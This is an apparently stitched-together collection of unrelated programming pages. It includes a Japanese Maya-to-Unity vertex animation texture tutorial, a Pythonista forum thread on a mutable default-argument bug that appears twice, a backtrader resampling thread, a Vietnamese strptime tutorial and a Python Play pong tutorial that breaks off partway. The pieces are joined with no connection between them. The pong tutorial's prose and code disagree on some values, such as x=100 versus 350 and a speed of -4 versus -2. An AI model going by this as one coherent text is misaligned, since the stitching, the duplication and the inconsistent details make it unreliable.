VertexAnimationTexture略してVATとも呼ばれ、各フレームの頂点情報をテクスチャにベイクする技術です。クロスや波など、ボーンでは表現の難しい動きを記録/再生することに向いています。
一般的にクロスや流体のシミュレーションは処理が重いため、事前計算を行う場合があります。このとき計算した結果を保持しておき、ランタイムではその再生のみを行うことになります。VATではGPUでの再生処理が可能であるため、ネックになりやすいCPU負荷を抑えることができます。
今回は頂点アニメーションをテクスチャにベイクするMayaプラグインの作成を行い、ベイクしたテクスチャを使用した頂点アニメーションシェーダーの実装をUnityで行います。
実装したツールとシェーダー
今回実装したツールとシェーダーのソースはGitHubで公開しています。
MITライセンスとしますので、よろしければ試してみてください。
環境
環境は以下のとおりです。
周辺のバージョンであれば問題なく動作するかと思います。
– Windows 10もしくはmacOS Catalina
– Maya 2019
– Unity 2019.4.5f1_Built-in Render Pipeline
こちらにツールとサンプルシーンを同梱しています。
MayaのクロスシミュレーションであるnClothを設定し、落とすだけのサンプルシーンです。
この布の動きをテクスチャにベイクします。
ツールの導入、使い方はリポジトリのREADMEを参照ください。
Maya実装詳細
今回は頂点位置のみをテクスチャにベイクすることにします。
MayaのプラグインはMel,Python,C++のいずれかで実装可能ですが今回はPythonを用い、UIや画像処理部分はQtを用います。
プラグインの雛形としては以下のドキュメントを参照ください。少し古いページですが”Hello World!”を出力するサンプルが確認できます。
この雛形をベースにVATを実装していきます。
ここでは一部の処理をピックアップして紹介します。
Meshの各頂点の座標を取得
シーン上のオブジェクトを指定し、Maya APIを用いて情報を取得します。
ここでは”pSphere1”の頂点数、各頂点の座標を取得しています。
mesh = "pSphere1"
vertex_size = cmds.polyEvaluate(mesh, v=True)
for v in range(vertex_size):
pos = cmds.pointPosition(mesh + ".vtx[" + str(v) + "]", l=True)
print(pos)
# result
[0.14877812564373016, -0.9876883625984192, -0.048340942710638046]
[0.12655822932720184, -0.9876883625984192, -0.0919499322772026]
[0.0919499322772026, -0.9876883625984192, -0.12655822932720184]
…
各フレームで任意の処理を実行
アニメーションの再生開始時間と終了時間を取得して、その間で処理を行なっています。ここでは現在の時間を1ずつ動かし、各フレームにてprint処理を行っています。
start_time = cmds.playbackOptions(q=True, min=True)
end_time = cmds.playbackOptions(q=True, max=True)
current_time = start_time
while (current_time <= end_time): # Including the last time
cmds.currentTime(current_time)
print("current_time:" + str(current_time))
current_time += 1
# result
current_time:1.0
current_time:2.0
current_time:3.0
...
画像を扱う
画像の作成、ピクセルカラーの設定、保存を行います。
Maya 2019はQt 5.6.1を使用することができますが、このバージョンでは32bitテクスチャまでしか作成することができません。
画像は32bit、ピクセルカラーは64bitになってしまい少し違和感がありますが、Maya 2019では仕方ありません。
Maya 2020ではQt 5.12.5を使用することができるため、64bitであるFormat_RGBA64を使用することができます。
from PySide2 import QtGui
_MAX_SIZE_64 = 65535
_PATH_TO_IMAGE ="/Users/.../sample.png"
img = QtGui.QImage(256, 256, QtGui.QImage.Format_ARGB32) # Maya2019 can't use Format_RGBA64
img.fill(0)
img.setPixelColor(0, 0, QtGui.QColor.fromRgba64(_MAX_SIZE_64, 0, 0, _MAX_SIZE_64))
img.save(_PATH_TO_IMAGE, quality=100)
計算精度について
最低限の実装はここまでですが、使用ケースによっては32bitでは精度が心配な場合もあるかと思います。
そこでサンプル実装では頂点情報にバイアス係数をかけ、擬似的に計算精度に上げられるようにしました。Unityにて逆数のスケールをかけて、スケールを戻す処理を行っていることに注意してください。
生成されるテクスチャの例を上げます。
左の画像のようにグレーに近い画像の場合は、精度が低く情報が潰れてしまっている可能性があります。頂点情報がベイクされたものなので人間が読める形ではないのですが、適切にベイクされていれば右の画像のようになんらかの模様が見て取れるかと思います。使用ケースによって適切な計算精度を設定できるように調整してみてください。
また今回はaチャンネルは使用していませんが、Height情報のベイクに用いるなどさらなる拡張が可能です。
こちらにサンプルプロジェクトを用意しています。
Mayaツールでベイクしたテクスチャを元に布の動きを再生します。
Unity実装詳細
BuiltInレンダリングパイプラインのunlitシェーダーの頂点シェーダー部分を拡張して実装しました。
今回は紹介しませんが、シェーダーグラフでも同様の手法で再現が可能です。頂点番号から位置情報(テクスチャx方向)を取得する
ピクセルの中心からサンプリングするため、頂点番号 + 0.5を座標としていることに注意してください。
#define ts _PosTex_TexelSize
float x = float(vid + 0.5f) * ts.x; // ts.x = 1.0/width
時間からフレーム情報(テクスチャy方向)を取得する
今回はマテリアルのプロパティでループの有無を設定できるようにしています。
#if ANIM_LOOP
t = fmod(t, 1.0f);
#else
t = saturate(t);
#endif
float y = 1.0f - t;
サンプリング
頂点番号と現在フレームからサンプリング座標を決定することができましたので、VATテクスチャからRGB画素をサンプリングします。
RGBの値を頂点のXYZ座標に設定します。
今回は精度を得るために擬似的にかけたスケールを戻し、中心化を行っています。
float4 pos = tex2Dlod(_PosTex, float4(x, y, 0.0f, 0.0f));
v2f o;
o.vertex = UnityObjectToClipPos(CorrectionValue
* float4(- (pos.x - 0.5f), pos.y - 0.5f, pos.z - 0.5f, 0.0f));
o.uv = TRANSFORM_TEX(v.uv, _MainTex);
UNITY_TRANSFER_FOG(o,o.vertex);
return o;
テクスチャインポータの設定
ベイク後のテクスチャはその各画素に情報を持っているため、圧縮などを行うことができません。
そこでインポート設定を以下に変更します。
– sRGB (Color Texture) : Off
– Non-Power of 2 : None
– Generate Mip Maps : Off
– FilterNode : Point (no filter)
– Format : RGBA 32 bit
各項目の内容に関してはUnity公式ドキュメントを参照ください。
(https://docs.unity3d.com/ja/2019.4/Manual/class-TextureImporter.html)
FBXインポータの設定
MayaとUnityで頂点番号が一致している必要があります。
そこでインポータ設定を以下に変更します。
⁻Optimize Mesh:Nothing
詳細はUnity公式ドキュメントを参照ください。
https://docs.unity3d.com/ja/2018.4/Manual/FBXImporter-Model.html
最後に
今回はMayaとUnityを用いて頂点アニメーションテクスチャの実装を行いました。簡素なものとしましたので、各プロジェクト用に最適化する余地があるかと思います。今回紹介したスクリプトはMaya/UnityともにGitHubにて公開していますので、皆様の参考になれば幸いです。
VATは3D技術として珍しいものではなく、負荷対策として活用しているプロジェクトも多いかと思います。またゲームエンジンとDCCツールを分離して作り込むことができる利点もあり、エンジンとツールの両方から最適化することが可能です。
UnityエンジニアがMayaのプラグイン開発を行うのは抵抗があるかもしれませんが、チームにDCCツールがわかるエンジニア、引いてはTAが1人いるだけでクオリティやアセット制作効率が変わってくるかと思います。私はまだまだ駆け出しですが、モバイルゲーム開発においてもTAが増えていけばいいなと思っています。
|
NavView Template
niz
I've created a NavView template and put it on GitHub for anyone to use as a starting point for creating a NavView based app using Pythonista. https://github.com/ncarding/NavViewTemplate
I've done this because it took me ages to workout how to do it myself and I wanted to give something back to the community that unknowingly helped me workout all the problems along the way.
There is however a fairly large bug with the template that needs fixing before it is truly useful. I've tried various things and I just can't workout why the bug is there and how to fix it.
As it stands the NavView has two levels: Groups and People. You can create as many Groups as you like and have as many People in each group as you like.
The UI is built with Pythonista's ui module. The logic uses a custom object orientated module called simple_module. The objects that are created are saved and loaded (for persistence) using the pickle module.
Known Issue
The People lists should be independent of the Group lists, but at the moment they are not.
If you add a new Group then add one or more People to that group and then add a second Group, the People from the first Group are automatically added to the second and any additional Groups.
I can't tell where the bug is but it only effects Groups created with each launch of the app. E.g. If you create three Groups they will all contain the same People. If you then quit the app and relaunch it those people will still be in each Group but if you create more Groups they will not contain the original list of People. These new Groups will however all share any new People added to any of the Groups created in this session.
Any suggestions as to why this is happening and how I might fix it are welcome.
All the code is at https://github.com/ncarding/NavViewTemplate
abcabc
The "
init" method in simple_module.py is not correct. You can not have "empty list" as default parameter.
See the discussion here.
http://effbot.org/zone/default-values.htm
http://docs.python-guide.org/en/latest/writing/gotchas/
Mostly this should fix your bug. I have not tested it.
class Group():
def __init__(self, name, people = []):
self.name = name
# people is a list of People objects
self.people = people
ccc
The "fix" code contains an empty list as a default parameter. :-(. I would suggest:
class Group():
def __init__(self, name, people=None):
self.name = name
# people is a list of People objects
self.people = people or [] # converts None into an empty list
abcabc
It is not the fix. It is the part of the code that has the problem. I should have worded that properly. Anyway thanks for the correction.
ccc
I made a pull request on the repo so there is no ambiguity... I think you are correct that it should solve the open issue.
ccc
niz
Thank you for your help. This has indeed fixed the problem.
The code is there for anyone that wants to make use of it.
Phuket2
@niz , thanks for sharing. I have just tried it as I have doing nothing with the nav view before, well at least that I can remember.
But 2 things that stand out.
Seems like it would be easy to make it Python 2.7 and 3 compatible with a try on the pickle import, and maybe a protocol change that either version of pickle loaded could read an existing file.
Support for different presentations, i.e. Sheet, panel.
Just an idea
Phuket2
niz
Thanks @Phuket2 for the suggestions. I will look into them.
|
```(aka backtick or grave accent) in a single line before and after the block. See: http://commonmark.org/help/
Question on resampledata with 1min data to 60 mins
Hi,
I'm resampling the 1 min data into 60 mins, with session start at 9:15 AM,
data = bt.feeds.GenericCSVData(
dataname=datapath,
fromdate=datetime.datetime(2019, 2, 26),
todate=datetime.datetime(2019, 2, 27),
timeframe=bt.TimeFrame.Minutes,
sessionstart=datetime.time(9, 15),
sessionend=datetime.time(15, 30),
dtformat=('%Y%m%d %H%M%S'),
headers=False,
separator=';',
datetime=0,
time=-1,
open=1,
high=2,
low=3,
close=4,
volume=5,
openinterest=-1)
cerebro.resampledata(data, timeframe=bt.TimeFrame.Minutes, compression=60)
1min data as following
2019-02-26 09:15:00, Open: 10794.00, High: 10818.00, Low: 10793.00, Close: 10817.60, Volume: 384900
2019-02-26 09:16:00, Open: 10817.00, High: 10833.00, Low: 10816.55, Close: 10833.00, Volume: 145650
2019-02-26 09:17:00, Open: 10831.70, High: 10843.45, Low: 10830.60, Close: 10830.60, Volume: 137250
2019-02-26 09:18:00, Open: 10831.40, High: 10836.00, Low: 10820.10, Close: 10820.10, Volume: 128400
2019-02-26 09:19:00, Open: 10820.10, High: 10821.05, Low: 10805.75, Close: 10815.05, Volume: 107550
2019-02-26 09:20:00, Open: 10816.10, High: 10816.10, Low: 10798.00, Close: 10798.00, Volume: 125550
.
.
.
2019-02-26 15:24:00, Open: 10826.85, High: 10827.35, Low: 10824.00, Close: 10826.25, Volume: 32400
2019-02-26 15:25:00, Open: 10826.40, High: 10826.90, Low: 10825.00, Close: 10825.00, Volume: 49050
2019-02-26 15:26:00, Open: 10825.00, High: 10825.50, Low: 10823.60, Close: 10823.65, Volume: 82800
2019-02-26 15:27:00, Open: 10823.75, High: 10825.00, Low: 10823.65, Close: 10824.50, Volume: 53100
2019-02-26 15:28:00, Open: 10824.00, High: 10825.90, Low: 10824.00, Close: 10824.95, Volume: 84750
2019-02-26 15:29:00, Open: 10825.00, High: 10825.00, Low: 10822.00, Close: 10822.00, Volume: 114750
60mins resample as following
2019-02-26 10:00:00, Open: 10794.00, High: 10843.45, Low: 10732.00, Close: 10732.75, Volume: 3788550
2019-02-26 11:00:00, Open: 10734.00, High: 10806.35, Low: 10725.20, Close: 10793.80, Volume: 3184800
2019-02-26 12:00:00, Open: 10794.95, High: 10847.05, Low: 10792.75, Close: 10832.75, Volume: 2198400
2019-02-26 13:00:00, Open: 10832.75, High: 10874.00, Low: 10815.75, Close: 10856.05, Volume: 1879650
2019-02-26 14:00:00, Open: 10856.05, High: 10862.00, Low: 10827.00, Close: 10845.95, Volume: 1197675
2019-02-26 15:00:00, Open: 10845.95, High: 10892.80, Low: 10817.00, Close: 10836.25, Volume: 2613675
2019-02-26 16:00:00, Open: 10835.55, High: 10844.00, Low: 10821.85, Close: 10822.00, Volume: 1374750
60mins resample starts frin 9 AM instead of 9:15 AM thats specified in the session start.
Can the resample to start from 9:15, instead of 9:00 Hours?
thanks in advance
Sathish
60mins resample starts frin 9 AM instead of 9:15 AM thats specified in the session start.
Can the resample to start from 9:15, instead of 9:00 Hours?
Sorry, but you see something which the rest of us probably doesn't ...
2019-02-26 10:00:00, Open: 10794.00, High: 10843.45, Low: 10732.00, Close: 10732.75, Volume: 3788550
2019-02-26 11:00:00, Open: 10734.00, High: 10806.35, Low: 10725.20, Close: 10793.80, Volume: 3184800
...
The first resampled bar has a timestamp of
10:00:00...
60mins resample starts frin 9 AM instead of 9:15 AM thats specified in the session start.
Can the resample to start from 9:15, instead of 9:00 Hours?
Sorry, but you see something which the rest of us probably doesn't ...
I did search in the community to see if anyone ran into similar issue, I didn't!
2019-02-26 10:00:00, Open: 10794.00, High: 10843.45, Low: 10732.00, Close: 10732.75, Volume: 3788550
2019-02-26 11:00:00, Open: 10734.00, High: 10806.35, Low: 10725.20, Close: 10793.80, Volume: 3184800
...
The first resampled bar has a timestamp of
10:00:00...
Yes right, it starts resample at 10:00 hours where I'm expecting 10:15, I can share the 1min data, if thats going to help to know on this issue.
60mins resample starts frin 9 AM instead of 9:15 AM thats specified in the session start.
Can the resample to start from 9:15, instead of 9:00 Hours?
Sorry, but you see something which the rest of us probably doesn't ...
I did search in the community to see if anyone ran into similar issue, I didn't!
This was meant as that you said
09:00and there was no09:00in your post.
2019-02-26 10:00:00, Open: 10794.00, High: 10843.45, Low: 10732.00, Close: 10732.75, Volume: 3788550
2019-02-26 11:00:00, Open: 10734.00, High: 10806.35, Low: 10725.20, Close: 10793.80, Volume: 3184800
...
The first resampled bar has a timestamp of
10:00:00...
Yes right, it starts resample at 10:00 hours where I'm expecting 10:15, I can share the 1min data, if thats going to help to know on this issue.
The bar ends at
10:00it doesn't start there. The timestamp is the last timestamp that was considered for the bar.
See if the
boundoffparameter can help. Docs - Data Resampling
tradersatzlast edited by tradersatz
60mins resample starts frin 9 AM instead of 9:15 AM thats specified in the session start.
Can the resample to start from 9:15, instead of 9:00 Hours?
Sorry, but you see something which the rest of us probably doesn't ...
I did search in the community to see if anyone ran into similar issue, I didn't!
This was meant as that you said
09:00and there was no09:00in your post.
Sorry, I didn't say it right, let me rephrase it,
Trading session starts at 9:15 AM and ends at 3:30 PM.
And my 1 min data starts at 9:15 AM and goes till 3:30 PM.
when i resample this data to 60 mins, I expect data to start 9:15 , 10:15, 11:15, 12:15 ... 2:15, 3:15, but the actual result is 10:00 AM to 4:00 PM.
expected resample data like following (Exported from Amibroker)
2019-02-26 09:15:00,10794.00,10843.45,10725.20,10758.00,4740525
2019-02-26 10:15:00,10756.90,10808.75,10743.20,10804.75,2665425
2019-02-26 11:15:00,10803.05,10847.05,10796.10,10831.00,2006025
2019-02-26 12:15:00,10830.05,10874.00,10815.75,10853.00,1806600
2019-02-26 13:15:00,10853.00,10860.40,10827.00,10858.25,1344075
2019-02-26 14:15:00,10858.25,10892.80,10817.00,10829.00,2825550
2019-02-26 15:15:00,10828.05,10835.90,10821.85,10822.00,849300
I do set the session start and end dates on the initial data load, is this expected?
2019-02-26 10:00:00, Open: 10794.00, High: 10843.45, Low: 10732.00, Close: 10732.75, Volume: 3788550
2019-02-26 11:00:00, Open: 10734.00, High: 10806.35, Low: 10725.20, Close: 10793.80, Volume: 3184800
...
The first resampled bar has a timestamp of
10:00:00...
Yes right, it starts resample at 10:00 hours where I'm expecting 10:15, I can share the 1min data, if thats going to help to know on this issue.
The bar ends at
10:00it doesn't start there. The timestamp is the last timestamp that was considered for the bar.
See if the
boundoffparameter can help. Docs - Data Resampling
with boundoff=-15,
2019-02-26 09:15:00, 10794.00,10818.00,10793.00,10817.60,384900
2019-02-26 10:15:00, 10817.00,10843.45,10725.20,10757.00,4399200
2019-02-26 11:15:00, 10757.75,10808.75,10743.20,10805.00,2651175
2019-02-26 12:15:00, 10805.00,10847.05,10796.10,10829.75,2014575
2019-02-26 13:15:00, 10829.75,10874.00,10815.75,10850.25,1785600
2019-02-26 14:15:00, 10852.25,10860.40,10827.00,10857.20,1417125
2019-02-26 15:15:00, 10857.25,10892.80,10817.00,10835.90,2774700
2019-02-26 16:00:00, 10835.10,10835.10,10821.85,10822.00,810225
this is better, but not matching whats expected.
thanks
The easiest to would be to substract 15 minutes to all your timestamps with a filter and then resample.
The easiest to would be to substract 15 minutes to all your timestamps with a filter and then resample.
If you can point me documentation or code sample on the filter approach will be of great help.
I'm still curious why Session start time provided on the data source not considered while resampling, is that per design?
The easiest to would be to substract 15 minutes to all your timestamps with a filter and then resample.
Playing around more with different resample mintues,
15 mins setup
cerebro.resampledata(data, timeframe=bt.TimeFrame.Minutes, compression=15)
result:
2019-02-26 09:30:00, 10794.00,10843.45,10789.55,10805.00,1605225
2019-02-26 09:45:00, 10805.30,10807.30,10775.05,10782.00,912975
2019-02-26 10:00:00, 10782.00,10786.25,10761.00,10764.80,825375
.
.
.
2019-02-26 15:00:00, 10878.05,10879.90,10817.00,10834.90,822975
2019-02-26 15:15:00, 10833.20,10844.00,10823.00,10829.00,563325
2019-02-26 15:30:00, 10828.05,10835.90,10821.85,10822.00,849300
30 mins setup
cerebro.resampledata(data, timeframe=bt.TimeFrame.Minutes, compression=30)
result:
2019-02-26 09:30:00, 10794.00,10843.45,10789.55,10805.00,1605225
2019-02-26 10:00:00, 10805.30,10807.30,10761.00,10764.80,1738350
2019-02-26 10:30:00, 10764.45,10777.35,10725.20,10775.20,2370375
.
.
.
2019-02-26 14:30:00, 10849.90,10866.00,10837.05,10864.75,931950
2019-02-26 15:00:00, 10865.80,10892.80,10817.00,10834.90,1656675
2019-02-26 15:30:00, 10833.20,10844.00,10821.85,10822.00,1412625
60 mins setup
cerebro.resampledata(data, timeframe=bt.TimeFrame.Minutes, compression=60)
result:
2019-02-26 10:00:00, 10794.00,10843.45,10761.00,10764.80,3343575
2019-02-26 11:00:00, 10764.45,10806.35,10725.20,10794.85,3613125
2019-02-26 12:00:00, 10793.00,10847.05,10792.75,10827.85,2194800
2019-02-26 13:00:00, 10828.00,10874.00,10815.75,10853.10,1884750
2019-02-26 14:00:00, 10851.15,10862.00,10827.00,10849.90,1200000
2019-02-26 15:00:00, 10849.90,10892.80,10817.00,10834.90,2588625
2019-02-26 15:30:00, 10833.20,10844.00,10821.85,10822.00,1412625
As per my findings, It's working fine for 5, 10, 15 mins!
It's not working for 30 mins and 60 mins.
When I says not working, first bar in 60 mins should be 10:15, instead of 10, and for 30 mins, first bar to be 9:45.
I'll dig into the code as well.
|
NavView Template
niz
I've created a NavView template and put it on GitHub for anyone to use as a starting point for creating a NavView based app using Pythonista. https://github.com/ncarding/NavViewTemplate
I've done this because it took me ages to workout how to do it myself and I wanted to give something back to the community that unknowingly helped me workout all the problems along the way.
There is however a fairly large bug with the template that needs fixing before it is truly useful. I've tried various things and I just can't workout why the bug is there and how to fix it.
As it stands the NavView has two levels: Groups and People. You can create as many Groups as you like and have as many People in each group as you like.
The UI is built with Pythonista's ui module. The logic uses a custom object orientated module called simple_module. The objects that are created are saved and loaded (for persistence) using the pickle module.
Known Issue
The People lists should be independent of the Group lists, but at the moment they are not.
If you add a new Group then add one or more People to that group and then add a second Group, the People from the first Group are automatically added to the second and any additional Groups.
I can't tell where the bug is but it only effects Groups created with each launch of the app. E.g. If you create three Groups they will all contain the same People. If you then quit the app and relaunch it those people will still be in each Group but if you create more Groups they will not contain the original list of People. These new Groups will however all share any new People added to any of the Groups created in this session.
Any suggestions as to why this is happening and how I might fix it are welcome.
All the code is at https://github.com/ncarding/NavViewTemplate
abcabc
The "
init" method in simple_module.py is not correct. You can not have "empty list" as default parameter.
See the discussion here.
http://effbot.org/zone/default-values.htm
http://docs.python-guide.org/en/latest/writing/gotchas/
Mostly this should fix your bug. I have not tested it.
class Group():
def __init__(self, name, people = []):
self.name = name
# people is a list of People objects
self.people = people
ccc
The "fix" code contains an empty list as a default parameter. :-(. I would suggest:
class Group():
def __init__(self, name, people=None):
self.name = name
# people is a list of People objects
self.people = people or [] # converts None into an empty list
abcabc
It is not the fix. It is the part of the code that has the problem. I should have worded that properly. Anyway thanks for the correction.
ccc
I made a pull request on the repo so there is no ambiguity... I think you are correct that it should solve the open issue.
ccc
niz
Thank you for your help. This has indeed fixed the problem.
The code is there for anyone that wants to make use of it.
Phuket2
@niz , thanks for sharing. I have just tried it as I have doing nothing with the nav view before, well at least that I can remember.
But 2 things that stand out.
Seems like it would be easy to make it Python 2.7 and 3 compatible with a try on the pickle import, and maybe a protocol change that either version of pickle loaded could read an existing file.
Support for different presentations, i.e. Sheet, panel.
Just an idea
Phuket2
niz
Thanks @Phuket2 for the suggestions. I will look into them.
|
Hàm strptime() trong Python
Ở bài viết này, Quantrimang.com sẽ hướng dẫn bạn cách tạo một đối tượng datetime (ngày, giờ, thời gian) từ chuỗi tương ứng cùng các ví dụ cụ thể để bạn dễ hình dung và nắm bắt hàm tốt hơn.
Hàm strptime() trong Python sử dụng để tạo đối tượng datetime từ một chuỗi cho trước. Tuy nhiên không phải bất cứ chuỗi nào cũng có thể được truyền vào hàm, chuỗi ở đây phải thỏa mãn một định dạng nhất định để trả về kết quả.
Ví dụ 1: Chuyển chuỗi sang đối tượng datetime
from datetime import datetime
date_string = "11 July, 2019"
print("date_string =", date_string)
date_object = datetime.strptime(date_string, "%d %B, %Y")
print("date_object =", date_object)
Chạy chương trình, kết quả trả về:
date_string = 11 July, 2019
date_object = 2019-07-11 00:00:00
strptime() hoạt động như thế nào?
Strptime() có hai tham số:
Chuỗisẽ được chuyển đổi thành datetime.
Codeđịnh dạng.
Dựa trên chuỗi và code định dạng được truyền vào, phương thức trả về đối tượng datetime tương ứng của nó.
Trong ví dụ trên:
%d: Đại diện cho ngày trong tháng.Ví dụ: 01, 02, ..., 31.
%B: Tên tháng đầy đủ.Ví dụ: January, February...
%Y: Năm có bốn chữ số.Ví dụ: 2018, 2019...
Ví dụ 2: Chuyển string sang đối tượng datetime
from datetime import datetime
dt_string = "11/07/2018 09:15:32"
# Định dạng ở dạng dd/mm/yyyy
dt_object1 = datetime.strptime(dt_string, "%d/%m/%Y %H:%M:%S")
print("dt_object1 =", dt_object1)
# Định dạng ở dạng mm/dd/yyyy
dt_object2 = datetime.strptime(dt_string, "%m/%d/%Y %H:%M:%S")
print("dt_object2 =", dt_object2)
Chạy chương trình, kết quả trả về:
dt_object1 = 2018-07-11 09:15:32
dt_object2 = 2018-11-07 09:15:32
Danh sách code định dạng
Bảng bên dưới hiển thị tất cả các code định dạng mà bạn có thể truyền vào phương thức strptime().
Kí hiệu Ý nghĩa Ví dụ
%a Tên ngày trong tuần viết tắt Sun, Mon...
%A Tên ngày trong tuần viết đầy đủ Sunday, Monday...
%w Ngày trong tuần, dạng giá trị số 0, 1, ..., 6
%d Ngày trong tháng, dạng giá trị số (có giá trị 0 làm đệm trước ngày có 1 chữ số) 01, 02, ..., 31
%-d Ngày trong tháng, dạng giá trị số 1, 2, ..., 30
%b Tên tháng viết tắt Jan, Feb, ..., Dec
%B Tên tháng viết đầy đủ January, February...
%m Tháng trong năm, dạng giá trị số (có giá trị 0 làm đệm trước tháng có 1 chữ số) 01, 02, ..., 12
%-m Tháng trong năm, dạng giá trị số 1, 2, ..., 12
%y Giá trị năm 2 chữ số (có giá trị 0 làm đệm trước năm có 1 chữ số) 00, 01, ..., 99
%-y Giá trị năm 2 chữ số 0, 1, ..., 99
%Y Giá trị năm đầy đủ 2013, 2019...
%H Giờ theo hệ 24 tiếng (có giá trị 0 làm đệm trước giờ có 1 chữ số) 00, 01, ..., 23
%-H Giờ theo hệ 24 tiếng, dạng giá trị số 0, 1, ..., 23
%I Giờ theo hệ 12 tiếng, dạng giá trị số (có giá trị 0 làm đệm trước giờ có 1 chữ số) 01, 02, ..., 12
%-I Giờ theo hệ 12 tiếng 1, 2, ..., 12
%p Giờ địa phương là AM hoặc PM. AM, PM
%M Phút, dạng giá trị số (có giá trị 0 làm đệm trước phút có 1 chữ số) 00, 01, ..., 59
%-M Phút, dạng giá trị số 0, 1, ..., 59
%S Giây, dạng giá trị số (có giá trị 0 làm đệm trước giây có 1 chữ số) 00, 01, ..., 59
%-S Giây, dạng giá trị số 0, 1, ..., 59
%f Micro giây, dạng giá trị số (có giá trị 0 làm đệm trước giây có 1 chữ số) 000000 - 999999
%z Giờ bù UTC ở dạng +HHMM or -HHMM.
%Z Tên múi giờ
%j Ngày trong năm, dạng giá trị số (có giá trị 0, 00 làm đệm trước ngày có 1 và 2 chữ số) 001, 002, ..., 366
%-j Ngày trong năm, dạng giá trị số 1, 2, ..., 366
%U Số tuần trong năm (tính Chủ nhật là ngày đầu tuần). Tất cả các ngày trong năm mới trước Chủ nhật đầu tiên được coi là trong tuần 0. 00, 01, ..., 53
%W Số tuần trong năm (tính Thứ Hai là ngày đầu tuần). Tất cả các ngày trong năm mới trước Thứ Hai đầu tiên được coi là trong tuần 0. 00, 01, ..., 53
%c Trả về ngày giờ Mon Sep 30 07:06:05 2013
%x Trả về ngày 09/30/13
%X Trả về giờ 07:06:05
%% Ký tự '%' theo nghĩa đen. %
Kết quả ValueError trả về từ strptime()
Nếu hai tham số chuỗi và code định dạng được truyền vào strptime() không khớp với nhau thì bạn sẽ nhận được kết quả ValueError.
from datetime import datetime
date_string = "11/07/2018"
date_object = datetime.strptime(date_string, "%d %m %Y")
print("date_object =", date_object)
Kết quả trả về:
ValueError: time data '11/07/2018' does not match format '%d %m %Y'
|
ð¾ð Announcing Python Play (beta) & a pong game tutorial
Python Play is the easiest way to get started coding games and graphics projects.
@amasad and the repl.it team asked me to help them make an easy way for new programmers to start making games and graphics projects. As a result, we made Python Play, a code library for Python loosely based on Scratch. For more information about Python Play, you can read the documentation here.
This is a tutorial showing how to use Python Play to make a game. To follow along with the tutorial, you can go to this repl and add code line-by-line.
The game we'll be making is a pong game:
How to make a pong game with Python Play
To make this game, first we need a box. Copying and pasting the code below will put a box on the screen:
import play # this should always be the first line in your program
box = play.new_box(color='black', x=0, y=0, width=30, height=120)
play.start_program() # this should always be the last line in your program
After you've copied that code, click the "Run" button. You should see a tall black box in the middle of the screen.
If you change any of the stuff after new_box, it will change what the box looks like and where it shows up on the screen. Change x=0 to x=100 and the box moves over to the right:
box = play.new_box(color='black', x=350, y=0, width=30, height=120)
(Click the Run button after every code change you make. Also make sure you still have the import play and play.start_program() lines of code in your program.)
Changing x changes the horizontal position and changing y changes the vertical position of the box. You can try playing with these numbers to see how they work. Don't forget you can do negative numbers i.e. x=-100 (note the minus symbol in front).
Okay cool, a box is on the screen and we can change where it is. But how do we get it to do stuff? Change your code to look like this:
box = play.new_box(color='black', x=350, y=0, width=30, height=120)
@play.when_key_pressed('up')
async def do(key):
box.y += 10
Then try pressing the 'up' arrow on your keyboard. The box moves upward now!
The code above is saying "when the up arrow key is pressed, add 10 to the box's y position". Adding to the box's y position moves the box up on the screen. Can you guess how we could get the box to move down when the down arrow key is pressed?
Here's the full code for how you might do that:
box = play.new_box(color='black', x=350, y=0, width=30, height=120)
@play.when_key_pressed('up')
async def do(key):
box.y += 10
@play.when_key_pressed('down')
async def do(key):
box.y -= 10
(Remember that your program should still start with import play and end with play.start_program().)
So now the box moves up and down on the screen when we press the arrow keys.
Adding a ball
Now we need a ball. Add this line below the new_box line:
ball = play.new_box(color='dark red', x=0, y=0, width=20, height=20)
Now there's a ball but it's not moving.
To get it moving, here's the full code to put in your program:
ball = play.new_box(color='dark red', x=0, y=0, width=20, height=20)
ball.dx = 2
ball.dy = -1
# make the ball move
@play.repeat_forever
async def do():
ball.x += ball.dx
ball.y += ball.dy
This makes the ball move by changing its x and y position (repeating forever) by the horizontal speed dx and the vertical speed dy.
ball.dx and ball.dy are two variables we're making up to store the horizontal speed and vertical speed of the ball. The starting horizontal speed (dx) is 2 (to the right) and the vertical speed is -1 (down).
But the ball doesn't bounce off the paddle, it just goes right through. To fix that, we have to detect when the ball is right next to the paddle and reverse its direction. Add this code to your program:
# make the ball bounce off the player's paddle
@play.repeat_forever
async def do():
if (ball.right >= box.left) and (ball.top >= box.bottom) and (ball.bottom <= box.top) and (ball.left < box.left):
ball.dx = -2
Now the ball bounces off the paddle!
The code above checks three conditions which are best shown visually:
If the ball is anywhere over the red line in the grey areas, then the condition written below it becomes True. If all three conditions are True at the same time, that means the ball hit the paddle and its speed should be reversed (-4) so it goes the other way. (<= means "less than or equal" and >= means "greater than or equal").
Here's the whole program at this point:
import play
box = play.new_box(color='black', x=350, y=0, width=30, height=120)
ball = play.new_box(color='dark red', x=0, y=0, width=20, height=20)
ball.dx = 2
ball.dy = -1
@play.when_key_pressed('up')
async def do(key):
box.y += 10
@play.when_key_pressed('down')
async def do(key):
box.y -= 10
@play.repeat_forever
async def do():
ball.x += ball.dx
ball.y += ball.dy
# make the ball bounce off the player's paddle
@play.repeat_forever
async def do():
if (ball.right >= box.left) and (ball.top >= box.bottom) and (ball.bottom <= box.top) and (ball.left < box.left):
ball.dx = -2
play.start_program()
Adding a computer player
There should be another player. Let's create another box! Add this code near where you put the code starting with box = play.new_box:
other_box = play.new_box(color='black', x=-350, y=0, width=30, height=120)
other_box.dy = 3
We're making the box have a vertical speed of 2 when it moves, but we haven't made it move yet.
To make the computer player follow the ball, we can add this code to our program:
# make the computer player follow the ball
@play.repeat_forever
async def do():
if ball.x < 0 and abs(ball.y-other_box.y) > other_box.dy:
if other_box.y < ball.y:
other_box.y += other_box.dy
elif other_box.y > ball.y:
other_box.y -= other_box.dy
Now when the ball is on the left side of the screen, the computer player will move toward the ball! We add to the box's y if the box is below the ball, otherwise we subtract from the box's y if it's above the ball.
But oops, the ball doesn't bounce off the computer player's paddle (other_box). Let's make it do that by adding this code:
# make the ball bounce off the computer player's paddle
@play.repeat_forever
async def do():
if (ball.left <= other_box.right) and (ball.top >= other_box.bottom) and (ball.bottom <= other_box.top) and (ball.right > other_box.right):
other_box.dy = play.random_number(1, 4)
ball.dx = 2
This code works just like the collision code from above but in reverse for the left paddle. Also when the ball hits the paddle we change the paddle's speed to a random number between 1 and 4 so the paddle will move either slower or faster.
